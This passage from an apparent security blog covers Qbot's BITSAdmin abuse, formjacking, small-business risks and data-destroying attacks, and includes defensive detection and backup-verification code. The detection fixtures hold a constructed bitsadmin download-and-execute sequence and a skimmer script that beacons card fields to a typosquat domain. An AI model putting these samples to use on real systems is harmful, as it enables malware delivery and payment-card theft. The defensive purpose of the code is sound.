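    # password ('passwordabc') is still effectively that banned word.
    return any(w in base and len(w) >= 0.6 * len(base) for w in banned)


def check_new_password(password, min_length=8):
    """Return (ok, reason). Length is checked first, then the banned list."""
    if len(password) < min_length:
        return False, "too short"
    if is_banned(password):
        return False, "contains a banned common password"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("P@$$w0rd", "Password1", "Welcome2019!!", "correct-horse-battery"):
        print(candidate, "->", check_new_password(candidate))
```

Running the checker at reset time closes the gap the NCSC study describes: an attacker spraying the top 1,000 passwords gets nothing if none of them, or their obvious variants, can exist in the directory.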
Decade-Old Qbot Banking Malware Makes a Comeback
The decade-old Qbot banking malicious software (malware) has made a comeback, this time exploiting a tool that already exists on targeted computers: BITSAdmin.
Researchers at Varonis revealed that thousands of computers around the globe have been compromised and are under active control by a new variant of the Qbot malware, this time leveraging BITSAdmin, a common administration tool. The researchers said they found 2,726 unique victim IP addresses infected with this new variant of Qbot.
The researchers added that the number of victims is likely much larger, as many organizations use port address translation that hides internal IP addresses. The majority of the Qbot victims, Varonis researchers said, were located in the U.S., but victims were also found in Canada, the U.K., France, Brazil, Germany, South Africa, Russia, China and India.
What Is Qbot?
Qbot, also known as Qakbot or Pinkslipbot, is a malware that was first observed in the wild in 2007. Through the years, this malware has morphed into various versions due in part to the fact that the source code of this malware is publicly available. The various versions of Qbot retain the primary purpose of this malware, that is, to steal online banking account information from compromised computers.
According to Microsoft, over the years, cybercriminals behind Qbot have improved the Qbot code, enabling this malware to better “evade detection, stay under the radar longer, and increase the chances of spreading to other potential victims.”
Various versions of Qbot, including the latest version observed by Varonis, steal online banking account information from compromised computers through keylogging and hooking.
In keylogging, every keystroke that the victim enters is automatically captured and sent to the Qbot attackers. Hooking, also known as code hooking, modifies the behavior of a computer program. For instance, antivirus programs use hooking once they discover the presence of malware. On the flip side, cyberattackers use hooking as well, for instance to alter the behavior of a program or a browser, which can lead to the exfiltration of passwords and cookies (the small text files that a web browser stores on a user's computer).
Another common feature of Qbot variants is the worm-like capability or the ability to spread across an organization’s network and infect other systems without user interaction. According to Microsoft, Qbot "can drop copies in other machines in the network using Server Message Block (SMB) and then use remote execution to activate.” SMB is a Microsoft Windows protocol for sharing files over a network.
Another common feature of Qbot variants is the initial infection process. Like many other cyberattacks, Qbot initially arrives on the victim's computer through malicious email campaigns, containing a malicious attachment and/or link.
What Is BITSAdmin?
BITS in the term “BITSAdmin” stands for Background Intelligent Transfer Service (BITS). BITS is a component of Microsoft Windows operating systems that lets updates and other applications transfer files in the background without interrupting other networked applications.
Cybercriminals have learned to abuse BITS, using this legitimate administration tool for downloading, executing and even cleaning up after running malicious code. BITS jobs (tasks) can be created and managed through PowerShell, a tool capable of executing code from memory and providing administrative access directly to a device's core, and through the BITSAdmin tool, which can create download or upload BITS jobs and monitor their progress.
In the past, the cybercriminals behind Qbot have used PowerShell to download and run Mimikatz, another piece of malware that steals credentials, allowing attackers to move rapidly across a network once they have established an initial foothold.
Researchers at Varonis reported that the latest Qbot uses BITSAdmin, another common administration tool in Windows operating systems, to download Qbot’s loader, the component that executes the core malware.
The abuse of legitimate administration tools such as PowerShell and BITSAdmin is an example of “living off the land” cyberattack techniques, which exploit tools that already exist on targeted computers. Exploiting these common administration tools makes detection difficult.
One probable explanation why the cyberattackers behind the latest variant of Qbot use the administration tool BITSAdmin instead of PowerShell is that PowerShell is now closely monitored on enterprise systems. A recent study conducted by IBM showed that more than half (57%) of cyberattacks exploit tools that already exist on targeted computers. The IBM study highlighted that the administration tool most often exploited by cyberattackers is PowerShell.
Cyberattackers that abuse PowerShell and BITSAdmin first have to execute their malicious code on the targeted computer. The initial infection vector of PowerShell- and BITSAdmin-based attacks is often phishing: malicious emails that contain malicious attachments and/or links.
In the case of the latest variant of Qbot, Varonis researchers said the first infection was likely carried out via a phishing email that tricked the victim into running a malicious file. Cybersecurity best practices for mitigating phishing attacks also apply for mitigating PowerShell and BITSAdmin-based attacks. These mitigating measures include deleting any suspicious emails, especially those containing suspicious links and/or attachments, and avoiding enabling macros in Microsoft Office.
Disabling all BITS functionality as a preventive measure, meanwhile, is a tricky business, as this will likely have unintended side effects such as preventing legitimate software patching and updating. Mitigating measures that are specific to BITSAdmin-based attacks include modifying host firewall rules and other network controls to allow only legitimate BITS traffic, and monitoring usage of the BITSAdmin tool, including the command options “Transfer”, “Create”, “AddFile”, “SetNotifyFlags”, “SetNotifyCmdLine”, “SetMinRetryDelay” and “Resume”.
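The monitoring advice above can be turned into a scoring rule over process-creation telemetry: weight the listed bitsadmin.exe options, weight SetNotifyCmdLine highest because it runs a command when the job finishes, and add to the score whenever a job's URL points at a host outside the update servers the environment is known to use. The following is an added example for this article, not Varonis's, Microsoft's or the author's code; the events are constructed Sysmon-style process-creation records reduced to the fields a detection needs, and the allowlist of update hosts, the weights and the threshold are assumptions to be tuned per environment.

```python
"""Score bitsadmin.exe activity in process-creation telemetry.

Added illustrative example. Events are constructed, Sysmon-style records
(host, user, image, cmdline); hosts, users and addresses are made up.
"""
from urllib.parse import urlparse

# Options the article lists as worth monitoring, weighted by how much they
# contribute to a download-and-run chain. SetNotifyCmdLine executes an
# arbitrary command on completion, hence the highest weight.
WATCHED_OPTIONS = {
    "transfer": 2, "create": 1, "addfile": 2, "setnotifyflags": 1,
    "setnotifycmdline": 4, "setminretrydelay": 1, "resume": 1,
}
# Assumption: the hosts legitimate BITS jobs in this environment talk to.
ALLOWED_HOSTS = {"windowsupdate.com", "update.microsoft.com", "patches.example.internal"}

CONSTRUCTED_EVENTS = [
    {"host": "WS01", "user": "CORP\\svc_update", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer patchjob /download /priority normal "
                "https://update.microsoft.com/x.msu C:\\Temp\\x.msu"},
    {"host": "WS02", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /create job1"},
    {"host": "WS02", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /addfile job1 http://203.0.113.55/ld.bin C:\\Users\\Public\\ld.bin"},
    {"host": "WS02", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /SetNotifyCmdLine job1 C:\\Users\\Public\\ld.bin NULL"},
    {"host": "WS02", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /resume job1"},
    {"host": "WS03", "user": "CORP\\asmith", "image": "C:\\Program Files\\App\\app.exe",
     "cmdline": "app.exe --sync"},
]


def options_in(cmdline):
    """bitsadmin options are whitespace-separated tokens starting with '/'."""
    return [tok[1:].lower() for tok in cmdline.split() if tok.startswith("/") and len(tok) > 1]


def host_allowed(host):
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def score_event(event):
    """Return (score, reasons) for one process-creation record; 0 for non-bitsadmin images."""
    if not event["image"].lower().endswith("\\bitsadmin.exe"):
        return 0, []
    score, reasons = 0, []
    for opt in options_in(event["cmdline"]):
        weight = WATCHED_OPTIONS.get(opt, 0)
        if weight:
            score += weight
            reasons.append("option /" + opt)
    for tok in event["cmdline"].split():
        if "://" in tok:
            host = (urlparse(tok).hostname or "").lower()
            if not host_allowed(host):
                score += 3
                reasons.append("remote host not allowlisted: " + host)
    return score, reasons


def find_suspicious(events, threshold=4):
    """Sum scores per (host, user) so that a job built up over several
    bitsadmin invocations is judged as a whole, and report groups at or
    above the threshold. A lone /SetNotifyCmdLine already reaches it."""
    groups = {}
    for event in events:
        score, reasons = score_event(event)
        if score:
            group = groups.setdefault((event["host"], event["user"]), {"score": 0, "reasons": []})
            group["score"] += score
            group["reasons"].extend(reasons)
    return {key: g for key, g in groups.items() if g["score"] >= threshold}


if __name__ == "__main__":
    for (host, user), g in find_suspicious(CONSTRUCTED_EVENTS).items():
        print(host, user, g["score"], "; ".join(g["reasons"]))
```

The legitimate patch job on WS01 scores 2 (the Transfer option against an allowlisted host) and stays below the threshold, while the WS02 sequence accumulates the create, addfile, non-allowlisted download and SetNotifyCmdLine scores. Event ID 3 from the Microsoft-Windows-Bits-Client operational log carries the same job details and can feed the same scoring where process-creation logging is not available.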
Trend Shows Cybercriminals Are Turning to Formjacking
A newly released global cyberthreat trend shows that cybercriminals are turning to formjacking as a new get-rich-quick scheme.
In the recently released Internet Security Threat Report, Symantec reported that on average, more than 4,800 unique websites are compromised with formjacking every month. According to Symantec, formjacking has increased dramatically since mid-August 2018. By the end of 2018, Symantec said it detected 3.7 million formjacking attacks, with nearly a third of all detections occurring during November and December – the busiest online shopping period.
Symantec said that while any organization, regardless of size and location, which processes payments online is a potential victim of formjacking, small and medium-sized retailers are, by and large, the most widely compromised by formjacking attackers.
What Is Formjacking?
Formjacking is a type of cyberattack that injects malicious code into website forms. This malicious code allows attackers to steal credit card details and other personal and financial information that are entered into the compromised forms as information is automatically sent to attackers. Stolen information could be used by attackers to perform payment card fraud or attackers could sell these details to other cybercriminals.
According to Symantec, attackers need only 10 stolen credit cards from each of the more than 4,800 compromised websites each month to earn up to $2.2 million per month considering that the current value for each card is $45 in underground selling forums.
How Are Formjacking Attacks Carried Out?
In recent months, two methods of formjacking attacks were observed: supply chain attack and redirection chain.
Supply Chain Attack
One of the ways by which formjacking attackers gain access to a website and change the code on its checkout page is through a supply chain attack. In a supply chain attack, attackers gain access to a large organization’s website and change the code on its checkout page by exploiting security vulnerabilities in a smaller business that the larger company uses to provide various services.
The Ticketmaster formjacking case is an example of a formjacking attack carried out by means of a supply chain attack. In the Ticketmaster case, attackers injected malicious code into Ticketmaster’s checkout pages after compromising a chatbot used by Ticketmaster for customer support. This malicious code enabled the Ticketmaster attackers to capture payment card data and other information from customers and send them to their servers.
The chatbot used by Ticketmaster for customer support was hosted by Inbenta, an external third-party supplier to Ticketmaster. Inbenta chief executive Jordi Torras told ZDNet that attackers exploited a number of vulnerabilities in Inbenta’s servers and in the process altered the chatbot code.
The Ticketmaster formjacking case, therefore, wasn’t directly an attack against Ticketmaster but an attack on a third-party supplier, Inbenta. It’s worth noting that a supply chain attack was also used in the NotPetya attack in 2017, in which MEDoc, a tax and accounting software package, was used for the initial insertion of the NotPetya malware into corporate networks.
Supply chain attacks show that cybersecurity hygiene shouldn’t only be implemented within an organization’s internal IT systems but also for third-party software and applications.
Redirection chain as a means of carrying out a formjacking attack is a new technique used by attackers in late 2018. In a redirection chain attack, a user that uses a checkout page of an online retailer is redirected to the checkout page of another online retailer which is injected with formjacking code. When this user enters payment information, the information is sent both to the retailer as well as to the attackers.
In December 2018, Symantec reported that it detected a checkout page of a retail store in Paris which was injected with formjacking code. The injected formjacking code, Symantec said, collects the payment information entered by customers and posts it to the domain google-analyitics.org.
Symantec observed that popular online retailers’ checkout pages from different countries, such as the U.S., Japan, Australia, and Germany redirected to this one Paris checkout page. “This created an interesting redirection chain as customers of all these websites were being infected by formjacking at the same time,” Symantec said.
Symantec added that to make matters worse, the formjacking code in the above-mentioned redirection chain attack comes with Firebug, a debugging tool that prevents security researchers from analyzing the malicious code.
Formjacking attacks are becoming sophisticated and stealthy as shown in the above-mentioned examples. Users of compromised checkout pages may not realize they’re victims of formjacking as compromised checkout pages generally continue to operate as normal.
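Because a compromised checkout page keeps working, the practical defence is to audit what the page loads and where its scripts send data, and to treat any endpoint that merely resembles a trusted one (google-analyitics.org against google-analytics.com, from the Symantec case above) as a finding. The following is an added example written for this article, not Symantec's or the author's code: the checkout HTML is a constructed page whose inline script copies submitted form fields to the typosquat domain the article names, and the first-party domain, the trusted third-party list and the 0.8 similarity cut-off are assumptions.

```python
"""Audit a checkout page for script sources and outbound endpoints.

Added illustrative example. The HTML below is constructed; shop.example and
cdn.example-payments.com are made-up names standing in for a real shop and
its payment provider.
"""
import re
from difflib import SequenceMatcher
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = "shop.example"
TRUSTED_THIRD_PARTY = {"google-analytics.com", "cdn.example-payments.com"}

CONSTRUCTED_PAGE = """
<html><body>
<form id="checkout" action="/pay" method="post">
  <input name="card_number"><input name="cvv"><button>Pay</button>
</form>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function (e) {
  var d = new FormData(e.target);
  navigator.sendBeacon('https://google-analyitics.org/collect', new URLSearchParams(d));
});
</script>
</body></html>
"""

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def is_allowed(host):
    trusted = TRUSTED_THIRD_PARTY | {FIRST_PARTY}
    return any(host == t or host.endswith("." + t) for t in trusted)


def lookalike_of(host):
    """Trusted domain that `host` closely resembles without matching, else None."""
    best, best_ratio = None, 0.0
    for t in TRUSTED_THIRD_PARTY | {FIRST_PARTY}:
        ratio = SequenceMatcher(None, host, t).ratio()
        if ratio > best_ratio:
            best, best_ratio = t, ratio
    return best if 0.8 <= best_ratio < 1.0 else None  # 0.8 is an assumed cut-off


def audit_checkout(html):
    """Return findings for every script source or hard-coded endpoint not on the allowlist."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = (urlparse(src).hostname or "").lower()
        if not is_allowed(host):
            findings.append({"where": "external script", "host": host, "lookalike_of": lookalike_of(host)})
    for body in parser.inline:
        for url in URL_RE.findall(body):
            host = (urlparse(url).hostname or "").lower()
            if not is_allowed(host):
                findings.append({"where": "inline script endpoint", "host": host,
                                 "lookalike_of": lookalike_of(host)})
    return findings


if __name__ == "__main__":
    for f in audit_checkout(CONSTRUCTED_PAGE):
        print(f)
```

Run against a fetched copy of the live checkout page on a schedule, the audit catches both an injected inline skimmer and a swapped third-party script URL; the same allowlist, expressed as a Content-Security-Policy with script-src and connect-src directives, stops the browser from loading or contacting the unlisted host in the first place.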
Here are some cybersecurity measures in order to prevent formjacking attacks:
Why Small Businesses are at Risk of Cyberattacks
Launching a small business is hard work. It takes months of planning, research, marketing and strategizing. It demands commitment, sweat, possibly even tears.
But once you have that enterprise up and running, the realization that you’ve carved your own niche in a highly-competitive marketplace makes it all worth it.
Imagine you’ve gone through this process. Imagine you’ve invested all your energy, resources and money into building a small business. Imagine you’re feeling confident in your brand and excited for what the future holds.
Now, imagine how devastated you’d feel if your company was attacked by a cybercriminal.
A large-scale cyberattack can leave your small business facing real financial difficulties, expose your valuable data and prompt your clients to wonder how safe their information is in your hands.
Needless to say, this chain reaction can have a crushing impact on your small business. It could cause extensive disruptions to your workflow, triggering delays and adding friction to your client relationships.
So, why do hackers target small businesses? And what can you do to help safeguard your growing enterprise from their attacks?
A Complacent Approach to Cybersecurity
One reason hackers tend to target small businesses is complacency.
Not every emerging company falls into this camp, of course — some do take a strict approach to securing their network. However, it’s not uncommon to find small-business owners believing themselves to be ‘too small’ for hackers to target.
This mindset can be dangerous. It’s the very thing hackers will bank on to gain access to your system.
A Lack of Investment
Another issue is the lack of funds to finance high-quality cybersecurity solutions — and that’s understandable. After all, you have so much to cover already. Salaries. Rent. Equipment. The list goes on and on.
But cybersecurity must be a priority for your small business. Never underestimate hackers’ ruthlessness: a company without the money to pay for effective safeguards or a real grasp of how vulnerable they are is an ideal target. Criminals see an ill-informed, ill-prepared enterprise as low-hanging fruit.
Don’t make their ‘work’ easier. Don’t give them any obvious vulnerabilities to exploit.
Small Businesses are More Likely to Pay Ransoms
Ransomware has been a growing threat to companies of all sizes in the past year or so. Hackers essentially lock businesses out of their own systems (or, at least, parts of it) and demand money in exchange for their freedom.
Businesses don’t have to pay up to get full access again, as experts can help. However, small companies who may be a little less educated on the topic will believe handing the money over is the only way out of the situation.
They could also feel as if being unable to continue on track will put them out of business.
Untrained Staff Fall Prey to Phishing Scams
Hackers see small businesses as ripe targets as their staff may not be aware of common malware attacks and phishing scams. They may not recognize the warning signs of, say, infected email attachments or dangerous links.
This can open the door to data breaches, ransomware and more. Any employees responsible would no doubt feel incredibly guilty as their colleagues and clients face the consequences of their mistake.
But it’s not just their fault: it’s down to small businesses to make sure proper education and training are in place to maximize workers’ knowledge, boost vigilance and minimize threat levels.
How Can Small Businesses Protect Themselves Against Cyberattacks?
As a small-business owner, there are multiple steps you can take to protect your company, your employees and your clients from possible cybersecurity risks.
Implement a strict password strategy
We all have numerous passwords for online accounts. Maybe you have one or two for your banking. Perhaps a few more for streaming services (Netflix, Hulu etc.). You’ll probably have others for social networks too (Facebook, Twitter, Instagram, WhatsApp to name just a few).
It’s hard to keep track of these. That’s why so many of us use the same single password for every account — and that’s dangerous. Because if a hacker cracks it, they’ll have access to everything else too.
You can’t afford to make the same mistake with your business’s security. Make sure your team members understand just how important unique passwords are for the tools they use on a daily basis. They should create passwords including a mix of lowercase and uppercase characters, numbers and symbols.
This takes more time and can feel like a hassle, but it’s well worth it for added peace of mind. Make sure to change passwords once or twice a month, if not more often.
Invest in expert training
Consider bringing a cybersecurity expert into your business to train your employees on effective steps they can take to minimize their risk of exposing data to criminals.
This can make a big difference and empower workers with the confidence to remain vigilant at all times. If every member of the team knows how to identify a potential threat and take action to avoid it, your small business will be much safer against cyberattacks.
Be careful with authorizations
Sadly, cyberattacks may not originate from outside your business — they could be the work of an employee.
This may be an individual with a grudge or simply someone who’s incompetent. Whatever the reason, internal threats can be prevented by reviewing your authorization strategy.
Take care to only grant your most trustworthy, reliable employees access to sensitive data. Monitor your team’s activities and update your cybersecurity measures on a regular basis.
Every small business must take cyberattacks seriously. Never assume you’re not at risk just because there are so many bigger targets to aim for — this complacency and lack of preparation could be a hacker’s way in.
Trust our experts to provide all the help you need with your small business’s cybersecurity.
Contact us today to discuss your options with a member of our team and subscribe to our newsletter for the latest essential updates.
Can Your Organization Survive a Cyberattack that Permanently Destroys Data?
Financial gain, either short-term or long-term, is often the motive of most cyber criminals. Some cyber criminals, however, aren’t after financial gain, but rather, they’re simply out to cause as much damage as possible.
The recent cyberattack at email service provider VFEmail shows an unconventional motive of simple destruction. Milwaukee-based VFEmail, founded in 2001, provides email service to businesses and individuals.
The first hints of the cyberattack on VFEmail came out last February 11, when the company’s Twitter account issued a series of tweets about the attack, starting with a tweet that said, “This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.”
By 5 PM on February 11, the company declared on its website, “We have suffered catastrophic destruction at the hands of a hacker.” The company added that the attacker destroyed nearly two decades' worth of emails, all of its data in the US, on both primary and backup systems.
The company further said that the attacker hasn’t asked for ransom. “Just attack and destroy," the company said. When asked about the identity of the attacker, VFEmail owner Rick Romero tweeted it could be "someone who had data they didn't want found or I really pissed off."
This recent cyber incident isn’t the first time that cyber criminals have targeted VFEmail. In a blog post dated November 4, 2015, Romero shared that a group of hackers threatened to launch a distributed denial-of-service (DDoS) attack on his email service if he didn’t pay 5 Bitcoins.
True enough, after he refused to pay the ransom, VFEmail’s email service was disrupted by a DDoS attack, prompting Romero to expose the group's extortion campaign. In 2017, the company’s email service was once again disrupted by a series of DDoS attacks, prompting the company to change to a new hosting provider. In 2018, the company’s email service was once again disrupted by a DDoS attack.
It isn’t clear what actually caused the latest cyberattack on VFEmail. What’s clear, though, is that nearly two decades' worth of emails, all of the company’s data in the US on both primary and backup systems, are lost forever.
Other Cases of Disruptive Cyberattacks
WannaCry and NotPetya
WannaCry and NotPetya are two examples of cyberattacks that were meant mainly to destroy. At the height of the WannaCry attack on May 12, 2017, an estimated 300,000 computers in 150 countries were infected by the WannaCry malicious software (malware). Six weeks after the WannaCry attack, the NotPetya malware was launched, although it didn’t have as much impact as WannaCry.
Both WannaCry and NotPetya exhibit the characteristics of ransomware, a type of malware that’s designed to deny legitimate users access to computer files by encrypting those files. Similar to other ransomware, the WannaCry and NotPetya attackers also demanded ransom from their victims, assuring them that once the ransom was paid, the decryption key that would unlock the encrypted files would be given.
While exhibiting the characteristics of ransomware, both WannaCry and NotPetya were later found to be wipers, malware whose sole purpose is to destroy. Both WannaCry and NotPetya are considered wipers, not ransomware, because even when a victim paid the ransom, the attackers could not provide the correct decryption key: they themselves had no way of determining who had paid and who hadn’t.
Shamoon is another malware whose main purpose is destruction. In December 2018, Italian oil services firm Saipem reported that its servers based in the Middle East, India, Aberdeen and, in a limited way, Italy were infected by a variant of the Shamoon malware. As a typical effect of the Shamoon malware, Saipem said in a statement, the infection resulted in the "cancellation of data and infrastructures." Days after the statement, the company’s head of digital and innovation, Mauro Piasere, told Reuters that the attack crippled between 300 and 400 servers and up to 100 personal computers out of a total of about 4,000 Saipem machines.
According to Symantec, the latest version of Shamoon is far more destructive than the original Shamoon as the latest version has a new, second piece of wiping malware called “Trojan.Filerase,” a malware that deletes and overwrites files on the infected computer; while the original Shamoon malware itself erases the master boot record of the computer, rendering the computer unusable.
Because of the Filerase malware in the latest Shamoon version, Symantec said, recovery becomes impossible, compared to the older version of Shamoon in which the “files on the hard disk may be forensically recoverable.”
Here are some cybersecurity best practices in order to help prevent or minimize the effects of destructive cyberattacks – attacks that are meant to destroy:
Keep All Software Up-to-Date
Installing the latest patch or security update in a timely manner is one of the ways to keep destructive attacks at bay. Patches or security updates fix known security vulnerabilities that are likely to be exploited by cyber criminals.
Back-up Important Data
Similar to safeguarding your organization’s data from natural disasters such as fire and flood, having a backup of important data will enable your organization to bounce back from a debilitating destructive cyberattack.
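A backup only helps against a wiper if it survives the attack and if you can tell, before restoring, that its files have not been overwritten or deleted the way the article describes Filerase doing. A hash manifest written at backup time and stored apart from the backup host answers that question. The following is an added example for this article, not the author's or any vendor's code; the files and the simulated damage are constructed in a temporary directory.

```python
"""Hash manifest for a backup set, with a verifier that reports missing,
modified and unexpected files before a restore is attempted.

Added illustrative example; sample files are constructed in a temp directory.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path, chunk=1 << 16):
    """Stream a file through SHA-256 so large backups do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root):
    """Map every file under `root` (POSIX-style relative path) to its hash and size."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): {"sha256": sha256_file(p), "size": p.stat().st_size}
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def verify_against_manifest(root, manifest):
    """Compare the current tree with a manifest taken earlier."""
    current = build_manifest(root)
    missing = sorted(set(manifest) - set(current))
    unexpected = sorted(set(current) - set(manifest))
    modified = sorted(k for k in set(manifest) & set(current)
                      if current[k]["sha256"] != manifest[k]["sha256"])
    return {"missing": missing, "modified": modified, "unexpected": unexpected,
            "ok": not (missing or modified or unexpected)}


def demo():
    """Constructed scenario: take a backup and its manifest, then simulate a wiper
    overwriting one file with zeros and deleting another, and verify again."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "db").mkdir()
        (root / "db" / "mail.sqlite").write_bytes(b"constructed mailbox data" * 100)
        (root / "config.ini").write_text("[server]\nname=constructed\n")

        manifest = build_manifest(root)
        # In practice the manifest is written to a separate, offline location;
        # round-tripping through JSON stands in for that here.
        stored = json.loads(json.dumps(manifest))
        assert verify_against_manifest(root, stored)["ok"]

        (root / "db" / "mail.sqlite").write_bytes(b"\x00" * 2400)  # overwritten in place
        (root / "config.ini").unlink()                              # deleted
        return verify_against_manifest(root, stored)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The size field in the manifest lets an operator spot the in-place overwrite even without rehashing (the zero-filled file keeps its size here, which is exactly why the hash, not the size, is what the verifier trusts). Keeping at least one verified copy offline or immutable is what separates this from the VFEmail outcome, where primary and backup systems were reachable from the same compromised environment.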
Practice Network Segmentation
It’s also important to practice network segmentation, the process of dividing your organization’s network into subnetworks. Network segmentation ensures that if an attacker is able to infiltrate one of your organization’s subnetworks, the others won’t be affected.
Steve E. Driz, I.S.P., ITCP